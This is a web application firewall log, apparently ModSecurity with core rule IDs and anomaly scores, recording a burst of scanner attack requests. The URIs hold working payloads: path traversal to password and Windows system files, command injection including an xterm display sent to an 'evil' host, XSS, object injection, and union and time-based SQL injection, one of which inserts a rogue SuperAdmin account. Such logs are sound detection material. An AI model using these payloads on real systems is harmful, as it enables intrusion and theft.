TimeStamp [17/May/2022:19:52:17 +0200]	Uri [/../../../windows/win.ini%0D]	PLmin [1]	Score [20]	Nattacks [4]	[921190]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:52:18 +0200]	Uri [/../..//directory/filename.ext]	PLmin [1]	Score [10]	Nattacks [3]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:52:19 +0200]	Uri [/cgi-bin/test.cmd?&dir=../../../etc%2fhosts%00]	PLmin [1]	Score [50]	Nattacks [6]	[920270]	[920440]	[930100]	[930110]	[930120]	[949110]
TimeStamp [17/May/2022:19:52:20 +0200]	Uri [/../../db/UINhis.dat%0D]	PLmin [1]	Score [20]	Nattacks [4]	[921190]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:52:21 +0200]	Uri [/../../../db/UINmsg.dat%0D]	PLmin [1]	Score [20]	Nattacks [4]	[921190]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:52:22 +0200]	Uri [/cgi-bin/admin.php?../../../etc%2fhosts%00]	PLmin [1]	Score [30]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[949110]
TimeStamp [17/May/2022:19:52:22 +0200]	Uri [/yabb/scripts/?board=../../etc/passwd%00]	PLmin [1]	Score [50]	Nattacks [6]	[920270]	[930100]	[930110]	[930120]	[932160]	[949110]
TimeStamp [17/May/2022:19:52:24 +0200]	Uri [/../../../db/UINhis.dat%0D]	PLmin [1]	Score [20]	Nattacks [4]	[921190]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:52:24 +0200]	Uri [/../../../db/UINhis.idx%0D]	PLmin [1]	Score [20]	Nattacks [4]	[921190]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:52:25 +0200]	Uri [/../../windows/win.ini%0D]	PLmin [1]	Score [20]	Nattacks [4]	[921190]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:52:26 +0200]	Uri [/../../../windows/user.dat]	PLmin [1]	Score [15]	Nattacks [4]	[920440]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:52:27 +0200]	Uri [/cgi-bin/scripts//protected-directory/etc/passwd%00]	PLmin [1]	Score [5]	Nattacks [2]	[920270]	[949110]
TimeStamp [17/May/2022:19:52:27 +0200]	Uri [/?wp-query-uncheckout=../../somefile.ext]	PLmin [1]	Score [20]	Nattacks [3]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:52:28 +0200]	Uri [/cgi-bin/pfdispaly.cgi?%27%0A/usr/bin/X11/xterm%20-display%20evil:0.0%7C%0D]	PLmin [1]	Score [10]	Nattacks [3]	[921150]	[932105]	[949110]
TimeStamp [17/May/2022:19:52:29 +0200]	Uri [/cgi-bin/perl.exeetc/passwd%00]	PLmin [1]	Score [5]	Nattacks [2]	[920270]	[949110]
TimeStamp [17/May/2022:19:52:30 +0200]	Uri [/../../../windows/system.dat%0D]	PLmin [1]	Score [20]	Nattacks [4]	[921190]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:52:30 +0200]	Uri [/cgi-bin/php.cgi/protected-directory/etc/passwd%00]	PLmin [1]	Score [5]	Nattacks [2]	[920270]	[949110]
TimeStamp [17/May/2022:19:52:31 +0200]	Uri [/../../windows/system.dat%0D]	PLmin [1]	Score [20]	Nattacks [4]	[921190]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:52:32 +0200]	Uri [/test.cmd?&dir=../../../somefile.ext]	PLmin [1]	Score [25]	Nattacks [4]	[920440]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:52:33 +0200]	Uri [/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd]	PLmin [1]	Score [15]	Nattacks [4]	[930120]	[932100]	[932160]	[949110]
TimeStamp [17/May/2022:19:52:34 +0200]	Uri [/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd]	PLmin [1]	Score [15]	Nattacks [4]	[930120]	[932100]	[932160]	[949110]
TimeStamp [17/May/2022:19:52:35 +0200]	Uri [/../../db/UINmsg.idx%0D]	PLmin [1]	Score [20]	Nattacks [4]	[921190]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:52:37 +0200]	Uri [/cgi-bin/?wp-query-uncheckout=../../etc/passwd%00]	PLmin [1]	Score [50]	Nattacks [6]	[920270]	[930100]	[930110]	[930120]	[932160]	[949110]
TimeStamp [17/May/2022:19:52:38 +0200]	Uri [/scripts/?step=4&option=pass&confirm=flow&newPssword=flow../../etc/passwd%00]	PLmin [1]	Score [55]	Nattacks [6]	[920270]	[930100]	[930110]	[930120]	[932160]	[949110]
TimeStamp [17/May/2022:19:52:39 +0200]	Uri [/scripts/?step=4&option=pass&confirm=flow&newPssword=flow../../etc/]	PLmin [1]	Score [25]	Nattacks [3]	[930100]	[930110]	[949110]
TimeStamp [17/May/2022:19:52:40 +0200]	Uri [/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E]	PLmin [1]	Score [15]	Nattacks [4]	[941100]	[941110]	[941160]	[949110]
TimeStamp [17/May/2022:19:52:41 +0200]	Uri [/ossim/dashboard/sections/widgets/data/image.php?type=test&wtype=blah&height=1&range=1&class=1&id=&adj=1&value=a%3A5%3A{s%3A3%3A%22top%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22adjustment%22%3Bs%3A8%3A%22original%22%3Bs%3A6%3A%22height%22%3Bs%3A3%3A%22123%22%3Bs%3A7%3A%22refresh%22%3BO%3A10%3A%22IDS_Report%22%3A3%3A{s%3A9%3A%22%00*%00events%22%3Bs%3A9%3A%22testevent%22%3Bs%3A7%3A%22%00*%00tags%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22%00*%00impact%22%3Bs%3A16%3A%22Object+Injection%22%3B}s%3A7%3A%22content%22%3Bs%3A36%3A%22aHR0cDovL3d3dy50ZXN0LmNvbS8xLnBuZw%3D%3D%22%3B}]	PLmin [1]	Score [15]	Nattacks [3]	[920270]	[933170]	[949110]
TimeStamp [17/May/2022:19:52:43 +0200]	Uri [/index.php?c=api&m=data2&auth=820686a208b89d4c2f8b6f2622eff83e&param=action=module%20form=1%20module=news%20field=1%0aunion%0aselect%0auser()%23]	PLmin [1]	Score [10]	Nattacks [3]	[932115]	[942190]	[949110]
TimeStamp [17/May/2022:19:52:44 +0200]	Uri [/wordpress/wp-admin/admin.php?page=SpiderCalendar&search_events_by_title=&page_number=1&serch_or_not=&nonce_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar&id_for_playlist=&asc_or_desc=1&order_by=id%2c(select*from(select(sleep(30)))a)]	PLmin [1]	Score [5]	Nattacks [2]	[942160]	[949110]
TimeStamp [17/May/2022:19:52:44 +0200]	Uri [/zm/index.php?view=request&request=log&task=download&key=a9fef1f4&format=texty9fke%27%3Chtml%3E%3Chead%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(1)%3C%2fscript%3E%3C/body%3E%3C/html%3Eayn2h]	PLmin [1]	Score [20]	Nattacks [5]	[921130]	[941100]	[941110]	[941160]	[949110]
TimeStamp [17/May/2022:19:52:46 +0200]	Uri [/index.php?c=api&m=data2&auth=820686a208b89d4c2f8b6f2622eff83e&param=action=related%20module=news%20tag=1%20field=1%0aunion%0aselect%0auser()%23]	PLmin [1]	Score [10]	Nattacks [3]	[932115]	[942190]	[949110]
TimeStamp [17/May/2022:19:52:47 +0200]	Uri [/index.php?c=api&m=data2&auth={md5(SYS_KEY)}&param=action=related%20module=news%20tag=1,2%20catid=1,12))%0aand%0a0%0aunion%0aselect%0a*%0afrom(((((((((((((((((((select(user()))a)join(select(2))b)join(select(3))c)join(select(4))d)join(select(5))e)join(select(6))f)join(select(7))g)join(select(8))h)join(select(9))i)join(select(10))j)join(select(11))k)join(select(12))l)join(select(13))m)join(select(14))n)join(select(15))o)join(select(16))p)join(select(17))q)join(select(18))x)%23]	PLmin [1]	Score [20]	Nattacks [5]	[932115]	[942190]	[942270]	[942360]	[949110]
TimeStamp [17/May/2022:19:52:49 +0200]	Uri [/search/members.json?id%60%3D-1%29%2f%2a%2a%2funion%2f%2a%2a%2fselect%2f%2a%2a%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cuser%28%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23balisong=1]	PLmin [1]	Score [5]	Nattacks [2]	[942190]	[949110]
TimeStamp [17/May/2022:19:52:50 +0200]	Uri [/theme/eldy/style.css.php?lang=de%27%3BINSERT%20INTO%20llx_user%20VALUES%20(424242%2C%200%2C%20NULL%2C%20NULL%2C%201%2C%200%2C%20%271984-01-01%2000%3A00%3A00%27%2C%20%271984-01-01%2000%3A00%3A00.000%27%2C%20NULL%2C%20NULL%2C%20%27newadmin%27%2C%20NULL%2C%20%2761529519452809720693702583126814%27%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20NULL%2C%20%27SuperAdmin%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%201%2C%201%2C%201%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20%272017-03-10%2000%3A00%3A00%27%2C%20%272017-03-10%2000%3A00%3A00%27%2C%20NULL%2C%20%27%27%2C%20NULL%2C%201%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20NULL%2C%200%2C%20%27%27%2C%200%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL)%3B--%27]	PLmin [1]	Score [5]	Nattacks [2]	[942350]	[949110]
TimeStamp [17/May/2022:19:52:51 +0200]	Uri [/shop/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN&orders_status=-111'))or(Select(case(36)when(ascii(substring(`customers_password`FROM(1)FOR(1))))then-sleep(5)End)from`customers`where`customers_id`=1)/*&customers_status=*/%23]	PLmin [1]	Score [10]	Nattacks [3]	[942160]	[942230]	[949110]
TimeStamp [17/May/2022:19:52:52 +0200]	Uri [/GeniXCMS/?author=user1&type=hi%27%20OR%20(SELECT%201431%20FROM(SELECT%20COUNT(*),CONCAT((MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,54)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20bPMf]	PLmin [1]	Score [10]	Nattacks [3]	[942140]	[942190]	[949110]
TimeStamp [17/May/2022:19:52:54 +0200]	Uri [/gadgets/definitions/uptime.CapacityWhatifGadget/getxenmetrics.php?query_type=xenserverMem&time_frame=1&element=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))tayk)]	PLmin [1]	Score [5]	Nattacks [2]	[942160]	[949110]
TimeStamp [17/May/2022:19:52:54 +0200]	Uri [/index.php?c=api&m=data2&auth=820686a208b89d4c2f8b6f2622eff83e&param=action=cache%20name=MEMBER.1'];phpinfo();$a=['1]	PLmin [1]	Score [5]	Nattacks [2]	[933160]	[949110]
